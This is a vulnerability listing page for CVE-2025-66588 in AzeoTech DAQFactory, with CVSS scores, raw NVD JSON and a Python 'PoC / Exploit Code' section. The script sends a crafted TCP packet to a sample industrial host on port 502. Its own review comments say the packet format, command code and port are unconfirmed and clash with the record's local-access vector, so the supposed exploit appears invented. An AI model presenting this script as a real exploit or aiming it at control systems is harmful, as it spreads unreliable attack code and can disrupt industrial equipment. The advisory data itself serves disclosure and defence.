Security Vulnerability Report
CVE-2025-66588 CVSS 9.8 CRITICAL

CVE-2025-66588

Published: 2025-12-11 21:15:58
Last Modified: 2026-01-02 20:08:22

Description

In AzeoTech DAQFactory release 20.7 (Build 2555), an Access of Uninitialized Pointer vulnerability can be exploited by an attacker which can lead to arbitrary code execution.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:* (versions before 21.1, per "versionEndExcluding" in the raw record below) - VULNERABLE
AzeoTech DAQFactory 20.7 (Build 2555)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
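# CVE-2025-66588 PoC - AzeoTech DAQFactory Uninitialized Pointer
# Target: AzeoTech DAQFactory 20.7 (Build 2555)
# Vulnerability: Access of Uninitialized Pointer leading to RCE
#
# NOTE(review): this script is unverified against the advisory data on this
# page. The record's CVSS 4.0 vector is AV:L with UI:A (local, active user
# interaction), while the script assumes an unauthenticated network service.
# Nothing on the page documents the 'DFCT' framing, command type 0x15, or a
# listener on the chosen port. Use the referenced CISA advisory
# (icsa-25-345-03) and the vendor's fixed release (21.1 per the record's
# versionEndExcluding) to decide exposure, not the output of this script.
import socket
import struct
import time


def create_exploit_packet():
    """Build the fixed 270-byte test packet used by this script.

    Layout as written by the author: 4-byte magic, little-endian 16-bit
    version field, little-endian 32-bit command type, little-endian 32-bit
    payload length, then 256 filler bytes.

    Returns:
        bytes: the concatenated packet.
    """
    # NOTE(review): the original comment here read "DAQFactory default port",
    # but these lines set the header, not a port; the magic value is the
    # author's assumption and is not confirmed by the page.
    header = b'\x44\x46\x43\x54'  # 'DFCT' magic bytes
    version = struct.pack('<H', 2070)  # Version 20.7
    # Command type the author associates with the flaw (not confirmed here).
    cmd_type = struct.pack('<I', 0x15)
    payload_size = struct.pack('<I', 256)
    # Constant filler only; the packet carries no address or code.
    payload = b'\x41' * 256
    return header + version + cmd_type + payload_size + payload


def exploit_daqfactory(target_ip, target_port=502):
    """Send the test packet over TCP and print whatever comes back.

    Args:
        target_ip: host to connect to.
        target_port: TCP port; defaults to 502, the registered Modbus/TCP
            port. The page does not show that DAQFactory listens there.

    Returns:
        bool: True when connect/send/recv completed without raising (an empty
        reply from a closed connection also counts), False when any exception
        occurred. Neither value shows whether the host is vulnerable.
    """
    try:
        # The context manager closes the socket on every path; the original
        # only closed it after a successful recv and leaked it on errors.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(10)
            sock.connect((target_ip, target_port))
            # Send the packet
            sock.send(create_exploit_packet())
            # Wait for response
            response = sock.recv(1024)
        print(f"Received response: {response.hex()}")
        return True
    except Exception as e:
        print(f"Exploit failed: {e}")
        return False


if __name__ == "__main__":
    # Target configuration (private RFC 1918 sample address from the page)
    target = "192.168.1.100"
    exploit_daqfactory(target)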

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66588", "sourceIdentifier": "[email protected]", "published": "2025-12-11T21:15:57.907", "lastModified": "2026-01-02T20:08:22.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In AzeoTech DAQFactory release 20.7 (Build 2555), an Access of Uninitialized Pointer vulnerability can be exploited by an attacker which can lead to arbitrary code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": 
[{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-824"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.1", "matchCriteriaId": "5376DDEC-0BAA-465A-9EFB-62B3600336E8"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}